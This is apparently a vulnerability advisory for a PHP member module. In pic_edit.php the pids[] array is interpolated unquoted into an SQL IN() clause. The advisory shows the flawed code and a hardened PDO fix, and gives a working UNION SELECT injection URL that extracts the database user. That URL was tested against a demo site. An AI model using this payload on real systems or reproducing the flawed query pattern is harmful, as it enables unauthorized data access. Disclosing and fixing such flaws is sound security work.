### Brief description:
Fighting
### Detailed description:
In /hy/member/homepage_ctrl.php:
```php
// $atn is restricted to [_a-z0-9]+ and must name an existing file under homepage_ctrl/,
// so it can only select one of the shipped controller scripts, e.g. pic_edit.php
if($atn&&eregi("^([_a-z0-9]+)$",$atn)&&is_file(dirname(__FILE__)."/homepage_ctrl/$atn.php")){
require_once(dirname(__FILE__)."/homepage_ctrl/$atn.php");
}
```
This includes the selected file. In hy\member\homepage_ctrl\pic_edit.php:
```php
if(count($pids)<1) showerr("至少选择一项");
// $pids comes straight from the request (pids[]) and is joined without any integer check
$pids=implode(",",$pids);
// the joined string is interpolated into the IN(...) clause with no quoting or escaping
$query=$db->query("SELECT * FROM {$_pre}pic WHERE pid IN($pids) ORDER BY orderlist DESC");
while($rs=$db->fetch_array($query)){
$rs[posttime]=date("Y-m-d H:i:s",$rs[posttime]);
//$rs[url]=$webdb[www_url]."/".$user_picdir.$rs[url];
$rs[url]=tempdir($rs[url]);
$listdb[]=$rs;
}
```
After `$pids=implode(",",$pids);` joins the array into a string, that string is placed directly into the query, and without single quotes around it, so SQL injection is possible directly through the `pids[]` parameter.
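A hardened version of the `pids[]` handling, added here as an example and not code from the reported application; the function names, the PDO-style `$db`, and the table prefix are assumptions.

```php
<?php
// Added example, not code from the reported application: hardened handling of the
// pids[] parameter before it reaches the IN(...) clause of the pic query.
// Function names, the PDO $db and the table prefix $pre are assumptions.

/**
 * Whitelist each element of $pids as a positive integer and return the list.
 * A value shaped like "1) union select ..." fails the pattern and is dropped,
 * so it can never be concatenated into SQL.
 */
function clean_pids(array $pids): array {
    $clean = [];
    foreach ($pids as $p) {
        if (is_int($p) || (is_string($p) && preg_match('/^[1-9][0-9]*$/', $p))) {
            $clean[] = (int) $p;
        }
    }
    return array_values(array_unique($clean));
}

/**
 * Safe replacement for the vulnerable query: the IN list consists of
 * placeholders only, and the integer values are bound, never interpolated.
 */
function fetch_pics(PDO $db, string $pre, array $pids): array {
    $ids = clean_pids($pids);
    if (count($ids) < 1) {
        throw new InvalidArgumentException('Select at least one item');
    }
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt  = $db->prepare("SELECT * FROM {$pre}pic WHERE pid IN($marks) ORDER BY orderlist DESC");
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input: the second element has the shape of the request in this report;
// only the plain integers survive the whitelist.
var_dump(clean_pids(['1', '1) union select 1,2,3,4,user(),6,7,8,9,10,11,12#', '7']));
```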
Register a member account, then request:
hy/member/homepage_ctrl.php?atn=pic_edit&pids[]=1) union select 1,2,3,4,user(),6,7,8,9,10,11,12%23
![9.jpg](https://images.seebug.org/upload/201410/261702222b76c8a56c32b2a05962f0181916bd5b.jpg)
Testing on the demo site:
![10.jpg](https://images.seebug.org/upload/201410/26170319485e8c2ff2ab681d7154cb2cb97517da.jpg)
Constructing the request:
![11.jpg](https://images.seebug.org/upload/201410/261703584e2a613e7513aaabbac7549bb30414a3.jpg)
### Proof of vulnerability:
![11.jpg](https://images.seebug.org/upload/201410/261703584e2a613e7513aaabbac7549bb30414a3.jpg)